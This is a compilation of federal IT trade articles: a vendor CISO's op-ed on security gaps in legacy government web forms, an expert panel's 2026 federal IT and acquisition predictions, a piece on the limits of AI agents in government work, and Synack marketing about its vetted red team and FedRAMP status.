Government agencies face a security challenge hiding in plain sight: outdated web forms that collect citizen data through systems built years — sometimes decades — ago. While agencies invest heavily in perimeter security and advanced threat detection, many continue using legacy forms lacking modern encryption, authentication capabilities and compliance features. These aging systems process Social Security numbers, financial records, health information and security clearance data through technology that falls short of current federal security standards.
The scale of this challenge is substantial. Government organizations allocate 80% of IT budgets to maintaining legacy systems, leaving modernization efforts chronically underfunded. Critical legacy systems cost hundreds of millions annually to maintain, with projected spending reaching billions by 2030. Meanwhile, government data breaches cost an average of $10 million per incident in the United States — the highest globally.
The encryption gap that persists
Despite the 2015 federal mandate establishing HTTPS as the baseline for all government websites, implementation gaps continue. The unencrypted HTTP protocol exposes data to interception, manipulation and impersonation attacks. Attackers positioned on the network can read Social Security numbers, driver’s license numbers, financial account numbers and login credentials transmitted in plain text.
Legacy government web forms that do implement encryption often use outdated protocols no longer meeting regulatory requirements. Older systems rely on deprecated hashing algorithms like SHA-1 and outdated TLS versions vulnerable to known exploits. Without proper security header enforcement, browsers don’t automatically use secure connections, allowing users to inadvertently access unencrypted form pages.
Application-layer vulnerabilities
Beyond transmission security, legacy web forms suffer from fundamental application vulnerabilities. Testing reveals that over 80% of government web applications remain prone to SQL injection attacks. Unlike private sector organizations that remediate 73% of identified vulnerabilities, government departments remediate only 27% — the lowest among all industry sectors.
SQL injection remains one of the most dangerous attacks against government web forms. Legacy forms constructing database queries using string concatenation rather than parameterized queries introduce serious vulnerabilities. This insecure practice allows attackers to inject malicious SQL code, potentially gaining unauthorized access to national identity information, license details and Social Security numbers. Attackers exploit these vulnerabilities to alter or delete identity records, manipulate data to forge official documents, and exfiltrate entire databases containing citizen information.
Cross-site scripting (XSS) affects 75% of government applications. XSS attacks enable attackers to manipulate users’ browsers directly, capture keystrokes to steal credentials, obtain session cookies to hijack authenticated sessions, and redirect users to malicious websites. Legacy forms also lack protection against CSRF attacks, which trick authenticated users into performing unwanted actions without their knowledge.
Compliance imperative
Federal agencies must comply with the Federal Information Security Management Act (FISMA), which requires implementation of National Institute of Standards and Technology SP 800-53 security controls including access control, configuration management, identification and authentication, and system and communications protection. Legacy web forms fail FISMA compliance when they cannot implement modern encryption for data in transit and at rest, lack multi-factor authentication capabilities, don’t maintain comprehensive audit logs, use unsupported software without security patches, and operate with known exploitable vulnerabilities.
Federal agencies using third-party web form platforms must ensure vendors have appropriate FedRAMP authorization. FedRAMP requires security controls compliance incorporating NIST SP 800-53 Revision 5 controls, impact level authorization based on data sensitivity, and continuous monitoring of encryption methods and security posture. Legacy government web forms implemented through non-FedRAMP-authorized platforms represent unauthorized use of non-compliant systems.
Real-world transmission failures
The gap between policy and practice is stark. Federal agencies commonly require contractors to submit forms containing Social Security numbers, dates of birth, driver’s license numbers, criminal histories and credit information via standard non-encrypted email as plain PDF attachments. When contractors offer encrypted alternatives, badge offices often respond with resistance to change established procedures.
Most federal agencies lack basic secure portals for PII submission, forcing reliance on email despite policies requiring encryption. Standard Form 86 for national security clearances and other government forms are distributed as fillable PDFs that can be completed offline, saved unencrypted, and transmitted through insecure channels — despite containing complete background investigation data for millions of federal employees and contractors.
Recent breaches highlight ongoing vulnerabilities. Federal departments have suffered breaches where hackers accessed networks through compromised credentials. Congressional offices have been targeted by suspected foreign actors. Private contractors providing employee screening services have confirmed massive data breaches affecting millions, with unauthorized access lasting months before detection.
What agencies must do now
Government agencies must immediately enforce HTTPS encryption for all web form pages using HTTP strict transport security, deploy server-side input validation to prevent SQL injection and XSS attacks, implement anti-CSRF tokens for each form session, add bot protection, enable comprehensive access logging, and conduct regular vulnerability scanning for Open Worldwide Application Security Project Top 10 vulnerabilities.
Long-term security requires replacing legacy forms with FedRAMP-authorized platforms that provide end-to-end encryption using AES-256 for data at rest and TLS 1.3 for data in transit, multi-factor authentication for both citizens and government staff, role-based access control with granular permissions, comprehensive audit trails capturing all data access events, and automated security updates addressing emerging vulnerabilities.
Secure data collection
The real question is not whether government agencies can afford to modernize outdated web forms, but whether they can afford the consequences of failing to do so. Every unencrypted submission, each SQL injection vulnerability, and each missing audit trail represents citizen data at risk and regulatory violations accumulating. Federal mandates established the security standards years ago. Implementation can no longer wait.
The technology to solve these problems exists today. Modern secure form platforms offer FedRAMP authorization, end-to-end encryption, multi-factor authentication, comprehensive audit logging, and automated compliance monitoring. These platforms can replace legacy systems while improving user experience, reducing operational costs, and meeting evolving security requirements.
Success requires more than technology adoption — it demands organizational commitment. Agency leadership must prioritize web form security, allocate adequate budgets for modernization, and establish clear timelines for legacy system replacement. Security and IT teams need the resources and authority to implement proper controls.
Government web forms represent the primary interface between citizens and their government for countless critical services. When these forms are secure, they enable efficient, trustworthy digital government services. When they’re vulnerable, they undermine public confidence in government’s ability to protect sensitive information. The path forward is clear: Acknowledge the severity of legacy web form vulnerabilities, commit resources to address them systematically, and implement modern secure solutions. The cost of action is significant, but the cost of inaction — measured in breached data, compromised systems, regulatory penalties and lost public trust — is far higher.
Frank Balonis is chief information security officer and senior vice president of operations and support at Kiteworks.
Let’s start with the good news: artificial intelligence may NOT be the buzzword for 2026.
What will be the most talked about federal IT and/or acquisition topic for this year remains up for debate. While AI will definitely be part of the conversation, at least some experts believe other topics will emerge over the next 12 months. These range from the Defense Department’s push for “speed to capability” to resilient innovation to workforce transformation.
Federal News Network asked a panel of former federal technology and procurement executives for their opinions what federal IT and acquisition storylines they are following over the next 12 months. If you’re interested in previous years’ predictions, here is what experts said about 2023, 2024 and 2025.
The panelists are:
Jonathan Alboum, federal chief technology officer for ServiceNow and former Agriculture Department CIO.
Melvin Brown, vice president and chief growth officer at CANI and a former deputy CIO at the Office of Personnel Management.
Matthew Cornelius, managing director of federal industry at Workday and former OMB and Senate staff member.
Kevin Cummins, a partner with the Franklin Square Group and former Senate staff member.
Michael Derrios, the new executive director of the Greg and Camille Baroni Center for Government Contracting at George Mason University and former State Department senior procurement executive.
Julie Dunne, a principal with Monument Advocacy and former commissioner of GSA’s Federal Acquisition Service.
Mike Hettinger, founding principal of Hettinger Strategy Group and former House staff member.
Nancy Sieger, a partner at Guidehouse’s Financial Services Sector and a former IRS CIO.
What are two IT or acquisition programs/initiatives that you are watching closely for signs of progress and why?
Brown: Whether AI acquisition governance becomes standard, templates, clauses, evaluation norms, 2026 is where agencies turn OMB AI memos into repeatable acquisition artifacts, through solicitation language, assurance evidence, testing/monitoring expectations and privacy and security gates. The 2025 memos are the anchor texts. I’m watching for signals such as common clause libraries, governmentwide “minimum vendor evidence” and how agencies operationalize “responsible AI” in source selections.
The Cybersecurity Maturity Model Certification (CMMC) phased rollout and how quickly it becomes a de facto barrier to entry. Because the rollout is phased over multiple years starting in November 2025, 2026 is the first full year where you can observe how often contracting officers insert the clause and how primes enforce flow-downs. The watch signals include protest activity, supply-chain impacts and whether smaller firms get crowded out or supported.
Hettinger: Related to the GSA OneGov initiative, there’s continuing pressure on the middleman, that is to say resellers and systems integrators to deliver more value for less. This theme emerged in early 2025, but it will continue to be front and center throughout 2026. How those facing the pressure respond to the government’s interests will tell us a lot about how IT acquisition is going to change in the coming years. I’ll be watching that closely.
Mike Hettinger is president and founding principal of Hettinger Strategy Group and former staff director of the House Oversight and Government Reform Subcommittee on Government Management.
The other place to watch more broadly is how the government is going to leverage AI. If 2025 was about putting the pieces in place to buy AI tools, 2026 is going to be about how agencies are able to leverage those tools to bring efficiency and effectiveness in a host of new areas.
Cornelius: The first is watching the Hill to see if the Senate can finally get the Strengthening Agency Management and Oversight of Software Assets (SAMOSA) Act passed and to the President’s desk. While a lot of great work has already happened — and will continue to happen — at GSA around OneGov, there is only so much they can do on their own. If Congress forces agencies to do the in-depth analysis and reporting required under SAMOSA, it will empower GSA, as well as OMB and Congress, to have the type of data and insights needed to drive OneGov beyond just cost savings to more enterprise transformation outcomes for their agency customers. This would generate value at an order of magnitude beyond what they have achieved thus far.
The second is the implementation of the recent executive order that created the Genesis Mission initiative. The mission is focused on ensuring that the Energy Department and the national labs can hire the right talent and marshal the right resources to help develop the next generation of biotechnology, quantum information science, advanced manufacturing and other critical capabilities empower America’s global leadership for the next few generations. Seeing how DOE and Office of Science and Technology Policy (OSTP) partner collaboratively with industry to execute this aspirational, but necessary, nationwide effort will be revelatory and insightful.
Cummins: Will Congress reverse its recent failure to reauthorize the Technology Modernization Fund (TMF)? President Donald Trump stood up the TMF during his first term and it saw a significant funding infusion by President Joe Biden. Watching the TMF just die with a whimper will make me pessimistic about reviving the longstanding bipartisan cooperation on modernizing federal IT that existed before the Department of Government Efficiency (DOGE).
I will be closely watching how well the recently-announced Tech Force comes together. Its goal of recruiting top engineers to serve in non-partisan roles focused on technology implementation sounds a lot like the U.S. Digital Service started by President Barack Obama, which then became the U.S. DOGE Service. I would like to see Tech Force building a better government with some of the enthusiasm that DOGE showed for cutting it.
Sieger: I’m watching intensely how agencies manage the IT talent exodus triggered by DOGE-mandated workforce reductions and return-to-office requirements. The unintended consequence we’re already observing is the disproportionate loss of mid-career technologists, the people who bridge legacy systems knowledge with modern cloud and AI capabilities.
Agencies are losing their most marketable IT talent first, while retention of personnel managing critical legacy infrastructure creates technical debt time bombs. At Guidehouse, we’re fielding unprecedented requests for cybersecurity, cloud architecture and data engineering services. The question heading into 2026 is whether agencies can rebuild sustainable IT operating models or whether they become permanently dependent on contractor support, fundamentally altering the government’s long-term technology capacity.
My prediction of the real risk is that mission-critical systems are losing institutional knowledge faster than documentation or modernization can compensate. Agencies need to watch and mitigate for increased system outages, security incidents, and failed modernization projects as this workforce disruption cascades through 2026.
Sticking with the above theme, it does bear watching how the new federal Tech Force hiring initiative succeeds. The federal Tech Force initiative signals a major shift in how the federal government sources and deploys modern technology talent. As agencies bring in highly skilled technologists focused on AI, cloud, cybersecurity and agile delivery, the expectations for speed, engineering rigor and product-centric outcomes will rise. This will reshape how agencies engage industry partners, favoring firms that can operate at comparable technical and cultural velocity.
The initiative also introduces private sector thinking into government programs, influencing requirements, architectures and vendor evaluations. This creates both opportunity and pressure. Organizations aligned to modern delivery models will gain advantage, while legacy approaches may struggle to adapt. Federal Tech Force serves as an early indicator of how workforce decisions are beginning to influence acquisition approaches and modernization priorities across government.
Dunne: Title 41 acquisition reform. The House Armed Services Committee and House Oversight Committee worked together to pass a 2026 defense authorization bill out of the House with civilian or governmentwide (Title 41) acquisition reform proposals. These reform proposals in the House NDAA bill included increasing various acquisition thresholds (micro-purchase and simplified acquisition thresholds and cost accounting standards) and language on advance payments to improve buying of cloud solutions. Unfortunately, these governmentwide provisions were left out of the final NDAA agreement, leaving in some cases different rules the civilian and defense sectors. I’m hopeful that Congress will try again on governmentwide acquisition reform.
Office of Centralized Acquisition Services (OCAS). GSA launched OCAS late this year to consolidate and streamline contracting for common goods and services in accordance with the March 2025 executive order (14240). Always a good exercise to think about how to best consolidate and streamline contracting vehicles. We’ve been here before and I think OCAS has a tough mission as agencies often want to do their own thing. If given sufficient resources and leadership attention, perhaps it will be different this time.
FedRAMP 20x. Earlier this year, GSA’s FedRAMP program management office launched FedRAMP 20x to reform the process and bring efficiencies through automation and expand the availability of cloud service provider products for agencies. All great intentions, but as we move into the next phase of the effort and into FedRAMP moderate type solutions, I hope the focus remains on the security mission and the original intent to measure once, use many times for the benefit of agencies. Also, FedRAMP authorization expires in December 2027 – which is not that far away in congressional time.
Alboum: In the coming year, I’m paying close attention to how agencies manage AI efficiency and value as they move from pilots to production. As budgets tighten, agencies need a clearer picture of which models are delivering results, which aren’t, and where investments are being duplicated.
I’m also watching enterprise acquisition and software asset management efforts. The Strengthening Agency Management and Oversight of Software Assets (SAMOSA) Act has been floating around Congress for the last few years. I’m curious to see whether it will ultimately become law. Its provisions reflect widely acknowledged best practices for controlling software spending and align with the administration’s PMA objective to “consolidate and standardize systems, while eliminating duplicative ones.” How agencies manage their software portfolios will be a crucial test of whether efficiency goals are turning into lasting structural change, or just short-term fixes.
Derrios: I’ll be watching how GSA’s OneGov initiative shapes up will be important because contract consolidation without an equal focus on demand forecasting, standardization and potential requirements aggregation may not yield the intended results. There needs to be a strong focus on acquisition planning between GSA and their federal agency customers in addition to any movement of contracts.
In 2025, the administration revamped the FAR, which hadn’t been reviewed holistically in 40 years. So in 2026, what IT/acquisition topic(s) would you like to see the administration take on that has long been overlooked and/or underappreciated for the impact change and improvements could have, and why?
Cummins: Despite the recent Trump administration emphasis on commercialization, it is still too hard for innovative companies to break into the federal market. Sometimes agencies will move mountains to urgently acquire a new technology, like we have seen recently with some artificial intelligence and drones initiatives. But a commercial IT company generally has to partner with a reseller and get third-party accreditation (CMMC, FedRAMP, etc.) just to get access to a federal customer. Moving beyond the FAR rewrite, could the government give up some of the intellectual property and other requirements that make it difficult for commercial companies to bid as a prime or sell directly to an agency outside of an other transaction agreement (OTA)? It would also be helpful to see more FedRAMP waivers for low-risk cloud services.
Cornelius: It’s been almost 50 years since foundational law and policy set the parameters we still follow today around IT accessibility. During my time in the Senate, I drafted the provision in the 2023 omnibus appropriations bill that required GSA and federal agencies to perform comprehensive assessments of accessibility compliance across all IT and digital assets throughout the government. Now, with a couple years of analysis and with many thoughtful recommendations from GSA and OMB, it is time for Congress to make critical updates in law to improve the accessibility of any capabilities the government acquires or deploys. 2026 could be a year of rare bipartisan, bicameral collaboration on digital accessibility, which could then underpin the administration’s American by Design initiative and ensure important accessibility outcomes from all vendors serving government customers are delivered and maintained effectively.
Derrios: The federal budgeting process really needs a reboot. Static budgets do not align with multi-year missions where risks are continuous, technology changes at lightning speed, and world events impact aging cost estimates. And without a real “return on investment” mentality incorporated into the budgeting process, under-performing programs with high sunk-costs will continue to be supported. But taxpayers shouldn’t have to sit through a bad movie just because they already paid for the ticket.
Brown: I’m watching how agencies continue to move toward the implementation of zero trust and how the data layer becomes the budget fight. With federal guides emphasizing data security, the 2026 question becomes, do programs converge on fewer, interoperable controls, or do they keep buying overlapping tools? My watch signals include requirements that prioritize data tagging/classification, attribute-based access, encryption/key management and auditability as “must haves” in acquisitions.
Alboum: Over the past few years, the federal government has made significant investments in customer experience and service delivery. The question now is whether those gains can be sustained amid federal staffing reductions.
Jonathan Alboum is a former chief information officer at the Agriculture Department and now federal chief technology officer for ServiceNow.
This challenge is closely tied to the “America by Design” executive order, which calls for redesigned websites where people interact with the government. A beautiful, easy-to-use website is an excellent start. However, the public expects a great end-to-end experience across all channels, which aligns directly with the administration’s PMA objective to build digital services for “real people, not bureaucracy.”
So, I’ll be watching to see if we meet these expectations by investing in AI and other technologies to lock in previous gains and improve the way we serve the public. With the proper focus, I’m confident that we can positively impact the public’s perception and trust in government.
Hettinger: Set aside the know and historic challenges with the TMF, we really do need to figure out how to more effectively buy IT at a pace consistent with the need of agencies. Maybe some of that is addressed in the FAR changes, but those are only going to take us so far (no pun intended). If we think outside the box, maybe we can find a way to make real progress in IT funding and acquisition in a way that gets the right technology tools in the hands of the right people more quickly.
Dunne: I think follow through on the initiatives launched in 2025 will be important to focus on in 2026. The formal rulemaking process for the RFO will launch in 2026 and will be an important part of that follow through. And now that we have a confirmed Office of Federal Procurement Policy administrator, I think 2026 will be an important year for industry engagement on topics like the RFO.
Sieger: If the administration could tackle one long-overlooked issue with transformative impact, it should be the modernization of security clearances are granted, maintained and reciprocally recognized for contractor personnel supporting federal IT initiatives.
The current clearance system regularly creates 6-to-12 month delays in staffing critical IT programs, particularly in cybersecurity and AI. Agencies lose qualified contractors to private sector opportunities during lengthy adjudication periods. The lack of true clearance reciprocity means contractors moving between agency projects often restart the process, wasting resources and creating knowledge gaps on programs.
This is a strategic vulnerability. Federal IT modernization depends on contractor expertise for specialized skills government cannot hire directly. When clearance processes take longer than typical IT project phases, agencies either compromise on talent quality or delay mission-critical initiatives. The opportunity cost is measured in delayed outcomes and increased cyber risk.
Implementing continuous vetting for contractor populations, establishing true cross-agency clearance reciprocity, and creating “clearance portability” would benefit emerging technology areas such as AI, quantum, advanced cybersecurity, where talent competition is fiercest. From Guidehouse’s perspective, we see clients are repeatedly unable to staff approved projects because cleared personnel aren’t available, not because talent doesn’t exist.
This reform would have cascading benefits: faster modernization, better talent retention, reduced costs and improved security through continuous monitoring rather than point-in-time investigations.
If 2025 has been all about cost savings and efficiencies, what do you think will emerge as the buzzword of 2026?
Brown: “Speed to capability” acquisition models spreading beyond DoD. The drone scaling example is a concrete indicator of a broader push. The watch signals for me are increased use of rapid pathways, shorter contract terms, modular contracting and more frequent recompetes to keep pace with technology change.
Cornelius: Governmentwide human resource transformation.
Julie Dunne, a former House Oversight and Reform Committee staff member for the Republicans, a former commissioner of the Federal Acquisition Service at the General Services Administration, and now a principal at Monument Advocacy.
Dunne: AI again. How the government uses it to facilitate delivery of citizen services and how AI tools will assist with the acquisition process, and AI-enabled cybersecurity attacks. I know that’s not one word, but it’s a huge risk to watch and only a matter of time before our adversaries find success in attacking federal systems with an AI-enabled cyberattack, and federal contractors will be on the hook to mitigate such risks.
Cummins: Fraud prevention. While combating waste, fraud and abuse is a perennial issue, the industrial scale fraud revealed in Minnesota highlights a danger from how Congress passed COVID pandemic-era spending packages without the same level of checks and balances that were put in place for earlier Obama-era stimulus spending. Federal government programs generally still have a lot of room for improvement when it comes to preventing improper payments, such as by using better identity and access management and other security tools. Stopping fraud is also one of the few remaining areas of bipartisan agreement among policymakers.
Hettinger: DOGE may be gone, or maybe it’s not really gone, but I don’t know that cost savings and efficiencies are going to be pushed to the backburner. This administration comes at everything — at least from an IT perspective — as believing it can be done better, faster and cheaper. I expect that to continue not just into 2026 but for the rest of this administration.
Derrios: I think there will have to be a focus on how government needs and requirements are defined and how the remaining workforce can upskill to use technology as a force multiplier. If you don’t focus on what you’re buying and whether it constitutes a legitimate mission support need, any cost savings gained in 2025 will not be sustainable long-term. Balancing speed-to-contract and innovative buying methodologies with real requirements rigor is critical. And how your federal workforce uses the tools in the toolbox to yield maximum outcomes while trying to do more with less is going to take focused leadership. To me, all of this culminates in one word for 2026, and that’s producing “value” for federal missions.
Sieger: Resilient innovation. While 2025 focused intensely on cost savings and efficiencies, particularly through DOGE-mandated cuts, 2026’s emerging buzzword will be “resilient innovation.” Agencies are recognizing the need to continue advancing technological capabilities while maintaining operational continuity under constrained resources and heightened uncertainty.
The efficiency drives of 2025 exposed real vulnerabilities. Agencies lost institutional knowledge, critical systems became more fragile, and the pace of modernization actually slowed in many cases as talent departed and budgets tightened. Leaders now recognize that efficiency without resilience creates brittleness—systems that work well under ideal conditions but fail catastrophically when stressed.
Resilient innovation captures the dual mandate facing federal IT in 2026: Continue modernizing and adopting transformative technologies like AI, but do so in ways that don’t create new single points of failure, vendor dependencies or operational risks. It’s about building systems and capabilities that can absorb shocks — whether from workforce turnover, budget cuts, cyber incidents or geopolitical disruption — while still moving forward.
Alboum: Looking ahead, governance will take the center stage across government. As AI, data and cybersecurity continue to scale, agencies will need stronger oversight, greater transparency and better coordination to manage complexity and maintain public trust. Governance won’t be a side conversation — it will be the foundation for everything that comes next.
Success will no longer be measured by how much AI is deployed, but by whether it is secure, compliant and delivering tangible mission value. The conversation will shift from “Do we have AI?” to “Is our AI safe, accurate and worth the investment?”
The vendor demo looks flawless, the script even cleaner. A digital assistant breezes through forms, updates systems and drafts policy notes while leaders watch a progress bar. The pitch leans on the promised agentic AI advantage.
Then the same agents face real public-sector work and stall on basic steps. The newest empirical benchmark from researchers at the nonprofit Center for AI Safety and data annotation company Scale AI finds current AI agents completing only a tiny fraction of jobs at a professional standard. Agents struggled to deliver production-ready outcomes on practical projects, including an explorer for World Happiness data, a short 2D promo, a 3D product animation, a container-home concept, a simple Suika-style game, and an IEEE-formatted manuscript. This new study should help provide some grounding on what agents can do inside federal programs today, why they will not replace government workers soon, and how to harvest benefits without risking mission, compliance or trust.
Benchmarks, not buzzwords, tell the story
Bold marketing favors smooth narratives of autonomy. Public benchmarks favor reality. In the WebArena benchmark, an agent built on GPT-4 achieved low end-to-end task success compared with human performance on real websites that require navigation, form entry and retrieval. The OSWorld benchmark assembles hundreds of desktop tasks across common apps with file handling and multi-step workflows, and documents persistent brittleness when agents face inconsistent interfaces or long sequences. Software results echo the same pattern. The original SWE-bench evaluates real GitHub issues across live repositories and shows that models generate useful patches, but need scaffolding and review to land working changes.
Duration matters. The H-CAST report correlates agent performance with human task time and finds strong results on short, well-bounded steps and sharp drop-offs on long, multi-hour work. That split maps directly to government operations. Agents can draft a memo outline or a SQL snippet. They falter when the job spans multiple systems, requires policy nuance, or demands meticulous document hygiene.
Building a public dashboard, as in the study run by researchers at the Center for AI Safety and Scale AI, is not a single chart; it is a reliable pipeline with provenance, documentation and accessible visuals. A 2D promo is not a storyboard alone; it is consistent assets, rights-safe media, captions and export settings that pass accessibility checks. A container-home concept is not a render; it is geometry, constraints and safety considerations that survive a technical review.
Federal teams must also contend with rules that raise the bar for autonomy. The AI Risk Management Framework from the National Institute of Standards and Technology gives a shared vocabulary for mapping risks and controls. These guardrails do not block Gen AI in government, they just make unsupervised autonomy a poor bet.
What this means for mission delivery, compliance and the workforce
The near-term value is clear. Treat agents as accelerators for specific tasks inside projects, not substitutes for the people who own outcomes. That approach matches field evidence. A large deployment in customer support showed double-digit gains in resolutions per hour when a generative assistant helped workers with suggested responses and knowledge retrieval, with the biggest lift for less-experienced staff. Translate that into federal work and you get faster first drafts, cleaner queries, more consistent formatting, and quicker starts on visuals, all checked by employees who understand policy, context and stakeholders.
Compliance reinforces the same division of labor. To run in production, systems must pass FedRAMP authorization, recordkeeping requirements and privacy controls. Content must meet Section 508 standards for accessibility. Security teams will lean on the joint secure AI development guidelines from the Cybersecurity and Infrastructure Security Agency and international partners to push model and system builders toward stronger practices. Auditors will use the Government Accountability Office’s accountability framework to probe governance, data quality and human oversight. Every one of those checkpoints increases the value of staff who can judge quality, interpret rules and stitch outputs into agency processes.
The fear that the large majority of federal work will be automated soon does not match the evidence. Agents still miss long sequences, stall at brittle interfaces, and struggle with multi-file deliverables. They produce assets that look plausible but fail validation or policy review. They need context from the people who understand stakeholders, statutes, and mission tradeoffs. That leaves plenty of room for productivity gains without mass replacement. It also shifts work toward specification, review and integration, roles that exist across headquarters and field offices.
A practical playbook federal leaders can use now
Plan for augmentation, not substitution. When I help government agencies adopt AI tools, we start by mapping projects into linked steps and flag the ones that benefit from an assistive agent. Drafting a response to a routine inquiry, summarizing a meeting transcript, extracting fields from a form, generating a chart scaffold, and proposing test cases are all candidates. Require a human owner for every deliverable, and publish acceptance criteria that catch the common failure modes seen in the benchmarks, including missing assets, inconsistent naming, broken links and unreadable exports. Maintain an audit trail that shows prompts, sources and edits so the work is FOIA-ready.
Ground the program in federal policy. Adopt the AI Risk Management Framework for risk mapping, and scope pilots to systems that can inherit or achieve FedRAMP authorization. Treat models and agents as components, not systems of record. Keep sensitive data inside authorized boundaries. Validate accessibility against Section 508 standards before anything goes public. For procurement, require vendors to demonstrate performance on public benchmarks like WebArena, OSWorld or SWE-bench using your agency’s constraints rather than glossy demos.
Staff and labor planning should reflect the new shape of work. Expect fewer hours on rote drafting and more time on specification, review and integration. Upskill employees to write good task definitions, evaluate model outputs, and enforce standards. Track acceptance rates, rework and defects by category so leaders can decide where to expand scope and where to hold the line. Publish internal guidance that explains when to use agents, how to attribute sources, and where human approval is mandatory. Share outcomes with the AI.gov community and look for common building blocks across agencies.
A brief scenario shows how this plays out without wishful thinking. A program office stands up a pilot for public-facing dashboards using open data. An agent produces first-pass code to ingest and visualize the dataset, similar to the World Happiness example. A data specialist verifies source URLs, adds documentation, and applies the agency’s color and accessibility standards. A policy analyst reviews labels and context language for accuracy and plain English. The team stores prompts, code and decisions with metadata for audit. In the same sprint, a communications specialist uses an agent to draft a 30-second script for a social clip and a designer converts it into a simple 2D animation. The outputs move faster, quality holds steady, and the people who understand mission and policy remain responsible for the results.
AI agents deliver lift on specific tasks and stumble on long, cross-tool projects. Public benchmarks on the web, desktop and code back that statement with reproducible evidence. Federal policy adds governance that rewards augmentation over autonomy. The smart move for agencies is to put agents to work inside projects while employees stay accountable for outcomes, compliance and trust. That plan banks real gains today and sets agencies up for more automation tomorrow, without betting programs and reputations on a hype cycle.
It’s natural to wonder who makes up the Synack Red Team (SRT), our dedicated team of 1,500+ security researchers, and how they ended up finding vulnerabilities in our customers’ IT systems (with permission, of course).
Companies want assurance they’re not opening the front door to just anybody. Much like you wouldn’t want a stranger in your home without a warm introduction from a mutual friend, we’ll explain how SRT researchers become part of an elite, global community of ethical hackers with diverse skill sets.
Becoming an SRT Member Requires Building Trust
One of the strengths of the SRT comes from its diverse community; our SRT members are top researchers in their respective fields—academia, government and the private sector. They hail from countries all around the world, including the United States, the United Kingdom, Canada, Australia and New Zealand. Human ingenuity takes many forms, and it’s that richness of difference that makes the SRT able to take on a seemingly endless list of security testing and tasks.
Before joining the team, each prospective SRT member must first complete a 5-step vetting process that is designed to assess skill and trustworthiness. Historically, less than 10% of applicants have been accepted into the SRT, as we strive to add only those trusted individuals who will contribute positive results without excess noise to the platform. While our process loosely resembles bug bounty models, Synack sets the bar higher.
Synack’s community team monitors online behavior from SRT members and removes SRT members immediately when required. Synack maintains a common standard and reward level across the SRT, allowing our clients to benefit from the clear understanding and agreement between SRT members and Synack for what constitutes a thorough report deserving of a high reward. They have collectively earned millions of dollars and have found thousands of vulnerabilities for Synack clients, including the U.S. Army and Air Force, the Centers for Disease Control and Protection and the Internal Revenue Service.
Baking “Trust But Verify” Into the Process
The Synack Platform ultimately powers our researchers. Synack works closely with clients to accurately scope testing and instruct them on how to use the Platform effectively.
The Platform is also where SRT researchers submit findings to be triaged by our Vulnerability Operations team. VulnOps ensures that quality results are delivered to the client in a variety of formats (e.g. easily digestible reports, integration of data into existing security software). Clients are also able to communicate directly with researchers for questions or follow up.
All SRT traffic goes through Synack’s VPN LaunchPoint to provide control and assurance around pentesting traffic. LaunchPoint focuses penetration testing traffic through one source, pauses or stops testing at the push of a button, provides complete visibility into the researcher’s testing activity with full packet capture, time-stamps traffic for auditing purposes and allows for data cleansing and deletion of sensitive customer data by Synack after it is no longer needed for testing.
Synack Works with Top Government and Private Sector Clients
Setting the bar higher allows Synack to work with clients who need additional assurance. Recently, we completed the requirements to achieve our FedRAMP Moderate “In Progress” level, which allows us to work with almost any U.S. federal agency. In past years, we’ve participated in Hack the Pentagon and several public hacking competitions for U.S. defense agencies, such as a 2019 effort in Las Vegas to find critical weaknesses in the F-15 fighter jet.
Malicious actors don’t need any clearance to hack into systems. Synack takes the task of combatting those bad actors seriously and our teams–from the Red Team to VulnOps–have worked to ensure that our clients receive vulnerability reports with actionable, secure information. We continue to innovate in the security testing and pentesting-as-a-service industry, ensuring privacy and security for all our clients while providing clear visibility into all testing through our trusted technology.
Interested in our work with the public sector? Click here.
Synack works with innovative government security leaders who are responsible for protecting their organizations by finding and remediating exploitable vulnerabilities before they can be used by an attacker. In this effort we have formed trusted partnerships with federal agencies and their consultants, helping them to achieve mission-critical goals safely. Synack has worked with more than 30 federal agencies to quickly identify known and unknown vulnerabilities before attackers can take advantage of them. And Synack has received Moderate “In Process” status from the Federal Risk and Authorization and Management Program (FedRAMP) underscoring Synack’s commitment to stringent data and compliance standards. This work is especially important in light of President Biden’s recent cybersecurity memorandum laying out steps that federal agencies need to take to protect the nation’s critical assets – its networks and data.
An example of such recent and essential work brings us back to December 12, 2021, when the U.S. Department of Homeland Security (DHS) issued a warning about the Log4j vulnerability. Federal agencies were required to identify if they had the vulnerability and remediate it by December 24th. The challenge for agencies trying to find this vulnerability was that the effort could take weeks. Synack’s SWAT team was able to identify vulnerability (and variants) in a matter of hours for agencies. Without Synack, this could have taken days or weeks to find. One Synack federal customer was able to successfully test more than 520 active hosts and 200 in a 24-hour period for this critical vulnerability.
Accenture Federal Services (Accenture) is a premier consultant to cabinet-level federal agencies, providing end-to-end cybersecurity services and skilled professionals to help agencies innovate safely and build cyber resilience. In partnering with Synack, Accenture brings to bear the power and speed of the Synack platform to help federal agencies be more proactive with their cybersecurity practices. Working together, Synack and Accenture are delivering innovative solutions, including continuous security testing, which empowers agencies to quickly detect and remediate vulnerabilities before they can be exploited. Synack’s comprehensive security testing complements Accenture’s hands-on consultative engagements support agencies integrating security into their organization.
Proactive components of security programs are so critical and yet often hard to perform at scale, primarily due to the cyber talent gap. Together, Accenture and Synack are successfully building proactive measures into agency-wide security programs with clear impact and staying power. We are regularly delivering on unprecedented find-to-fix vulnerability cycles, Vulnerability Disclosure Programs VDP (BoD 20-01), and testing in pre-production environments.
The Power of Synack & Accenture Federal Enables Security Teams for On-Demand Security Testing
Penetration testing at scale
Nimble responsiveness to time-sensitive customer needs
Continuous security posture testing
Evaluation of high-value assets and testing of internal, external, and cloud assets
Policy and compliance audits
The Synack/Accenture partnership is a strong example of how Synack can provide a higher level of pentesting and security evaluation to government customers with varying levels of security expertise. In-house pentesting is difficult to scale, but Synack’s community of the world’s most skilled and trusted ethical researchers delivers effective, efficient, and actionable security testing on-demand and at scale, allowing security teams to focus on the vulnerabilities that matter most.
Enabling Continuous Penetration Testing at Scale for Federal Agencies
Synack has paved the way as a trusted leader in Cybersecurity testing and vulnerability disclosure management. Now, Synack is raising the bar even higher by achieving the FedRAMP Moderate “In Process” milestone, helping to make federal data secure. Synack’s sponsoring agency for FedRAMP is the U.S. Department of Health & Human Services (HHS). Synack’s Discover, Certify, Synack365 and Synack Campaigns offerings are now available on the FedRAMP Marketplace.
FedRAMP and Synack
The Federal Risk and Authorization Management Program (FedRAMP) is a U.S. government-wide program that provides a standardized approach to security assessment, authorization and monitoring for cloud services. As part of its FedRAMP designation, Synack will be implementing 325 controls across 17 NIST 800-53 control families. Not only will this greatly enhance current protections for federal customer data, but it will also provide assurance to all our customers that Synack is reducing risk and providing government-grade data privacy protections.
The Growing Importance of Security Testing
